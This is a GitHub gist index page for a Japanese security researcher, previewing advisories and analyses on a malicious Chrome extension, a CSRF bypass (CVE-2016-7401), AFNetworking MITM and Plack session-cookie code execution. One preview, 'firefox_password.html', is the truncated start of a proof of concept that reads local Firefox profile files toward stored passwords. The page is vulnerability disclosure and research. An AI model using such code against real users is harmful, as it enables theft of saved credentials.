Skip to content

Instantly share code, notes, and snippets.

@mala
mala / a.md
Last active Jan 24, 2019
Chrome ExtensionのLive HTTP Headersの調査(CoolBar.Pro導入 Extensionが何を行うかの調査)
View a.md

Chrome ExtensionのLive HTTP Headersを調査した。Firefox用のものではない。Firefox用のものではない。

11/7追記

English version: https://translate.google.com/translate?sl=ja&tl=en&js=y&prev=_t&hl=ja&ie=UTF-8&u=https%3A%2F%2Fgist.github.com%2Fmala%2Fe87973df5029d96c9269d9431fcef5cb&edit-text=&act=url

Summary in english.

@mala
mala / 0.md
Last active Mar 20, 2019
Vulnerabilities related to url parser, etc / shibuya.xss #8
View 0.md
@mala
mala / cors_killer.js
Last active Nov 4, 2016
responseURLに対応していないライブラリを使っているときにクロスドメイン通信を無理やり止める
View cors_killer.js
// responseURLに対応していないライブラリを使っているときにクロスドメイン通信を無理やり止める
// https://github.com/jquery/jquery/pull/1615
// responseURL
// https://bugzilla.mozilla.org/show_bug.cgi?id=998076
// https://bugs.chromium.org/p/chromium/issues/detail?id=377583
// https://bugs.webkit.org/show_bug.cgi?id=136938
new function(){
@mala
mala / gist:457a25650950d4daf4144f98159802cc
Last active Sep 28, 2016
CVE-2016-7401 CSRF protection bypass on a site with Google Analytics の解説
View gist:457a25650950d4daf4144f98159802cc

CVE-2016-7401

多くのcookie parserは、pairsの区切りとして ; と , を許容しているのでdjango以外にも影響がある。 ブラウザが使用するcookie pairの区切りは実際には ;

View gist:4c45169891302e8d4a970fb4ad13134e
プライバシーとはデータ自体の公開、非公開の制御ではない。
- データ自体の公開、非公開には大した意味がなく、リンクこそが情報の本質である
- 自己に関する情報のコントロールが失われることが、プライバシーの侵害である
1. データ自体が秘密の情報ではない
情報の性質
- 明確に本人以外には秘密にしなければならないもの → 例: パスワード
- 住所 → 単体では単なる文字列、住民基本台帳調べれば出てくる、その土地に実際に行けば調べられる
@mala
mala / gist:f33c9654af5e06e8bca9
Last active Nov 15, 2016
クライアントサイドでガチャ
View gist:f33c9654af5e06e8bca9

目的

  • サーバー側でガチャのアイテムを選択すると確率操作している疑いがかかるので、事前に提示した確率から変更が出来ず疑いが掛からないような方式を提案する
  • サーバー側でもクライアント側でも不正が出来ないことが要件として求められる
  • 簡便なアルゴリズムで一般市民にも理解しやすく、また、解析によるアルゴリズムの把握が容易であることが望ましい

かんがえかた

これ相当のことを、サーバーとクライアントでやればいい。

@mala
mala / gist:fad5e0bc8a82a9c0fc9d
Last active Dec 29, 2016
AFNetworking 2.5.2 以下の脆弱性について
View gist:fad5e0bc8a82a9c0fc9d

未修正のアプリが数多く残っている状態なので、パブリックな場所での言及には注意して下さい

未修正のアプリが数多く残っている状況ですが、すでに広く情報が公開されており、2.5.2で修正されたという情報が広まると混乱が生じるため広く周知する次第です。

問題と経緯

AFNetworking 2.5.1 にMITM攻撃を許す脆弱性があり、2.5.2で修正された、 と報道されていますが、これは誤りです。

View firefox_password.html
<html>
<head></head>
<body>
<script>
function firefox_password(){
var username = location.href.match(/Users\/(.*?)\//)[1];
var base = "/Users/" + username + "/Library/Application\ Support/Firefox/";
var xhr = new XMLHttpRequest;
read_file(base + "profiles.ini", function(res){
var v = res;
@mala
mala / gist:9c8154f68d15be6145ad
Created Aug 14, 2014
Amon2及び関連モジュールのセキュリティアップデートに関する追加情報、及び Plack::Middleware::Session::Cookie の脆弱性について
View gist:9c8154f68d15be6145ad

HTTP::Session2::ClientStoreの影響について訂正があります。

以前の情報:

  • アプリケーションの実装や、ロードしているモジュールによっては、任意のコード実行に繋がる可能性があります

訂正後:

  • インストールされているモジュール次第で、任意のコード実行が可能です。
  • 典型的なWebアプリケーションの構成の場合、ほぼ確実に任意のコード実行が可能であることが確認されています。

Plack::Middleware::Session::Cookie にも同等の問題が確認されました。

You can’t perform that action at this time.